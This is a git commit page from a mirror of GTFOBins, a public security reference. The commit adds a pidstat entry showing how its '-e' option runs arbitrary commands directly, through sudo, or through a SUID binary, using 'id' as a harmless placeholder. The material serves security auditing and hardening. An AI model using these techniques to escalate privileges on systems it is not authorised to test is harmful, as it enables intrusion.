1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add pidstat

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Madesh Turaka 2022-05-01 15:09:54 +05:30 committed by GitHub
parent cd05b58e70
commit 7bc41773f6
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/pidstat.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
command:
- code: |
COMMAND=id
pidstat -e $COMMAND
sudo:
- code: |
COMMAND=id
sudo pidstat -e $COMMAND
suid:
- code: |
COMMAND=id
./pidstat -e $COMMAND
---